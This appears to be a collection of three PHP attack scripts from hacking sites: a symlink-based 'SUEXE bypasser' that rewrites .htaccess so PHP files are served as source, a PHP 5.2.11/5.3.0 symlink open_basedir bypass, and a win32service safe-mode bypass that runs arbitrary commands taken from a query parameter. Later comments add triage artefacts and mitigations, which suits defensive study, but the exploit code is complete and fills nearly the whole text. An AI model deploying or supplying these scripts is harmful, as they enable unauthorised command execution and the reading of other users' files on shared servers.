
SUEXE Bypasser Via Symlink (V 1.01) [Priv8]


<html> 
<body bgcolor="0000000"> 
<title>symlink</title> 
<center><b><h2><font color="red"> SUEXE Bypasser Via Symlink (V 1.01)</font></br></center></b></h2> 
<center><b><h4><font color="red">WITH THIS SCRIPT U CAN USE SYMLINK IN 2 METHODs</font></br></center></b></h4> 
<center><b><h4><font color="white">Dest = Destenation Of Path or file That u Want to Symlink It</font></br></center></b></h4> 
<center><b><h4><font color="white">name : File Name That u Want To create in ([path]/smlnk)</font></br></center></b></h4> 
<center><b><h4><font color="white">Upload This Script In Full SUEXE or FullPerm Directory</font></br></center></b></h4> 
<center><b><h4><font color="white">Written For *NIX Platforms</font></br></center></b></h4> 
</html> 

<?php 
//CODED BY IRAN 
//form defining 
// Prints a POST form with two free-text fields ("destenation" and "name")
// and copies both submitted values straight into $dest / $destname.
// NOTE(review): no authentication, CSRF token or input validation is visible
// in this section; anyone who can request the uploaded file can submit it.
// For triage: a POST to an unexpected .php file carrying the parameters
// "destenation", "name" and "_act" matches this form.
print "<form method=post>"; 
print "<center><font color=green>"; 
print "<b>dest :</b><input size=50 name='destenation' value=''>"; 
print "<br>"; 
print "<b>name :</b><input size=50 name='name' value=''>"; 
print "<br>"; 
print "<input type=submit name=_act value='Create!'>"; 
print "</center></font>"; 
// Raw request values; both are read even on the initial GET, when the keys are absent.
$dest = $_POST['destenation']; 
$destname = $_POST['name']; 
?> 

<?php 
//defining variables 
// Working directory: a folder named "smlnk" beside this script.
// For triage: an unexpected "smlnk" directory under a web root, holding
// symlinks that point outside the owning account, is the on-disk artefact.
$dir = dirname($_SERVER[SCRIPT_FILENAME])."/smlnk"; 
// Per-directory config file path, with the file name spelled exactly as written here.
$acc = $dir."/.htaceess"; 
// Shell command string assembled by plain concatenation of request data;
// no escapeshellarg() or path restriction is applied to $dest.
$cmd = "ln -s".chr(32).$dest.chr(32).$sym; 
$sym = $dir."/".$destname; 
// Apache directives, joined with chr(009) separators: allow symlink following,
// set a directory index, and remove PHP handling so .php is served as
// application/octet-stream. Presumably the aim is to have linked PHP files
// returned as source instead of executed.
// Mitigation (server side): restrict what per-directory overrides may change
// (AllowOverride), prefer SymLinksIfOwnerMatch over FollowSymLinks on shared
// hosts, and keep config files unreadable to other accounts.
$htaccess =  
"Options +FollowSymLinks".chr(009). 
"DirectoryIndex seees.html".chr(009). 
"RemoveHandler .php".chr(009). 
"AddType application/octet-stream .php"; 

// Create the working directory on first use.
if (!file_exists($dir)) { 
mkdir ($dir); 
}  
sleep(1); 
// Write the directives once; the handle is opened in append mode and is not closed here.
if (!file_exists($acc)) { 
$handle = fopen( "$acc" , 'a+' ); 
fputs( $handle ,  "$htaccess" ); 
}  
?> 

<?php 
//check method 
// Capability probe: $check is 1 when at least one of the four
// command-execution functions is reported by function_exists().
// These are the functions a hardened php.ini typically lists in
// disable_functions for web-facing pools.
if (function_exists (exec) OR function_exists (shell_exec) OR function_exists (system) OR function_exists (passthru)) { 
$check = 1; 
}else{ 
$check = 0; 
} 
// $checks is 1 when symlink() is reported by function_exists().
if(function_exists (symlink)) { 
$checks = 1; 
}else{ 
$checks = 0; 
} 
?> 

<?php 
//define command function 
$resault = '';  
// command($cmde): passes a non-empty string to the first available of
// exec(), shell_exec(), system(), passthru() and returns that call's result.
// The string is handed to the shell as-is; nothing in this function escapes
// or validates it.
// The @ prefix suppresses PHP warnings, so failed calls may leave nothing in
// the PHP error log. Process auditing (the web server user spawning a shell
// or `ln`) is the more reliable detection point.
function command($cmde) { 
    if (!empty($cmde))  
 {  
if (function_exists('exec')) { $resault = @exec($cmde); }  
elseif (function_exists('shell_exec')) { $resault = @shell_exec($cmde); }  
elseif (function_exists('system')) { $resault = @system($cmde); }  
elseif (function_exists('passthru')) { $resault = @passthru($cmde); }  
 } 
return $resault; 
} 
?> 

<?php 
//execution 
// Dispatch on the two capability flags: the shell command is used whenever a
// command-execution function is available; symlink() is used only when none is.
// Neither path checks where $dest points, so the link target is fully
// controlled by the request.
// When both flags are 0 (e.g. those functions are unavailable to this pool),
// only the failure message below is printed.
if ($check ==1 && $checks ==1){ command ($cmd); } 
elseif ($check ==1 && $checks ==0){ command ($cmd); } 
elseif ($check ==0 && $checks ==1) { symlink ($dest,$sym); } 
elseif ($check ==0 && $checks ==0)  
{  
print ("<center><font color=green><h1>script doesnt work for this server</font></h1></center>");  
} 
?> 
<?php 
//is safe mod on ? start 
// Environment disclosure: reads the safe_mode ini setting and prints ON/OFF
// to whoever requested the page.
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  
{  
$safe="<font color=red>ON</font>"; 
}  
else {$safe="<font color=green>OFF</font>";} 
echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>"; 
//open safe mod end-- 
?>  
<?php 
//disable function start 
// Environment disclosure: prints the server's disable_functions list (or
// NONE when it is empty), revealing the PHP hardening state to the requester.
echo "<font color=whitepurple>Disable functions :</font> <b>"; 
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} 
//disable function end-- 
?>

PHP 5.2.11/5.3.0 symlink() open_basedir bypass


<?php 
/* 
PHP 5.2.11/5.3.0 symlink() open_basedir bypass  
posted 3y HackTeach Loverz http://HackTeach.org/ 
i1t [ a.T] hotmail [ d0t] it 

CHUJWAMWMUZG 
*/ 

// Settings: name of the scratch directory and how many levels of it are nested.
// For triage: a chain of directories named "cx" nested this deep inside a
// writable web directory is an on-disk artefact of this script.
$fakedir="cx"; 
$fakedep=16; 

$num=0; // offset of symlink.$num 

// Target path comes from the request: the GET parameter "file" wins, then the
// POST parameter, else empty. No validation or allow-list is applied.
if(!empty($_GET['file'])) $file=$_GET['file']; 
else if(!empty($_POST['file'])) $file=$_POST['file']; 
else $file=""; 

// Prints the banner and a POST form with a single "file" field.
// $file is HTML-escaped before being echoed back into the value attribute;
// $_SERVER["HTTP_HOST"] is written into the form action without escaping.
// The banner loads a remote image from the author's site, so rendering the
// page also sends a request (with the viewer's IP) to that host.
echo '<PRE><img 
src="http://www.hackteach.org/public/images/main.gif"><P>This is exploit 
from <a 
href="http://HackTeach.org" title="Hack Teach Loverz">Storm , DareDevil 
Lab - HackTeach</a> labs. 
posted by : storm 
<p>Script for legal use only. 
<p>PHP 5.2.11 5.3.0 symlink open_basedir bypass 
<p>More: <a href="http://HackTeach.org/">HackTeachLoverz</a> 
<p><form name="form" 
 action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF 
"]).'" method="post"><input type="text" name="file" size="50" 
value="'.htmlspecialchars($file).'"><input type="submit" name="hym" 
value="Create Symlink"></form>'; 

// Nothing to do until a target path has been submitted.
if(empty($file)) 
    exit; 

// Everything below writes into the current directory, so it must be writable.
// Keeping web-served directories non-writable for the PHP user stops the
// script at this point.
if(!is_writable(".")) 
    die("not writable directory"); 

$level=0; 

// Create (if missing) and descend into $fakedep nested $fakedir directories.
for($as=0;$as<$fakedep;$as++){ 
    if(!file_exists($fakedir)) 
        mkdir($fakedir); 
    chdir($fakedir); 
} 

// Climb back up all but one level; execution continues inside the first $fakedir.
while(1<$as--) chdir(".."); 

// Mirror each non-empty segment of the requested path as a real directory
// at the current location, descending as it goes.
$hardstyle = explode("/", $file); 

for($a=0;$a<count($hardstyle);$a++){ 
    if(!empty($hardstyle[$a])){ 
        if(!file_exists($hardstyle[$a]))  
            mkdir($hardstyle[$a]); 
        chdir($hardstyle[$a]); 
        $as++; 
    } 
} 
// Return to the starting directory (mirrored depth plus the one remaining level).
$as++; 
while($as--) 
    chdir(".."); 

// Clear any leftover "fakesymlink" from an earlier run; errors are suppressed.
@rmdir("fakesymlink"); 
@unlink("fakesymlink"); 

// "fakesymlink" first exists as a symlink into the deep $fakedir chain.
@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink"); 

// this loop will skip allready created symlinks. 
// Creates "symlink<N>" whose target is a relative path through "fakesymlink"
// followed by $fakedep-1 "../" steps and the requested path, retrying with
// the next N until symlink() reports success.
while(1) 
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, 
"symlink".$num))) break; 
    else $num++; 

// "fakesymlink" is then swapped for a plain directory, which changes what the
// relative target stored in "symlink<N>" resolves to after it was created.
// NOTE(review): presumably this check-then-change sequence is what the title
// calls the open_basedir bypass on PHP 5.2.11/5.3.0 - confirm against the
// vendor advisory for those releases.
// For triage: "fakesymlink" and "symlink<N>" entries beside a nested "cx"
// chain in a writable web directory are artefacts of this script.
// Mitigation: run a supported PHP release, add symlink to disable_functions
// where it is not needed, and avoid FollowSymLinks across account boundaries
// (SymLinksIfOwnerMatch) on shared hosts.
@unlink("fakesymlink"); 
mkdir("fakesymlink"); 

// Prints a link to the created entry; the file is then fetched through the web server.
die('<FONT COLOR="RED">check symlink <a 
href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>'); 
?>

PHP 5.x (win32service) Local Safe Mode Bypass Exploit


<?php 
// Summary: takes a command from the query string, registers a temporary
// Windows service whose binary is the command interpreter, starts it so the
// command runs with its output redirected to a file, then removes the
// service and prints the file.
// NOTE(review): no authentication or validation of CMD is visible; the value
// is interpolated into the service parameters as-is.
// For triage: short-lived service installs (System log event 7045) with
// names beginning "NJ" and cmd.exe as the image path, cmd.exe started with
// "/c ... >" writing into PHP's upload_tmp_dir, and web requests carrying a
// CMD query parameter.
// Mitigation: do not load the win32service extension in web-facing PHP, and
// run the PHP worker under an account without rights to create services.
$command=(isset($_GET['CMD']))?$_GET['CMD']:'dir'; #command, defaults to 'dir'
$dir=ini_get('upload_tmp_dir'); #Directory to store command's output 
// Stops here unless the win32service extension is loaded.
if(!extension_loaded('win32service'))die('win32ser  vice extension not found!'); 
// Output file path and service name, each built from uniqid() with an "NJ" prefix.
$name=$dir."\\".uniqid('NJ'); 
$n=uniqid('NJ'); 
// Interpreter path: the ComSpec server variable when set, else a hard-coded d:\ path.
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; 
// Register, start, stop and delete the service in immediate succession.
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); 
win32_start_service($n); 
win32_stop_service($n); 
win32_delete_service($n); 
// Read the captured output, delete the file, and print it HTML-escaped.
$exec=file_get_contents($name); 
unlink($name); 
echo "<pre>".htmlspecialchars($exec)."</pre>"; 
?>
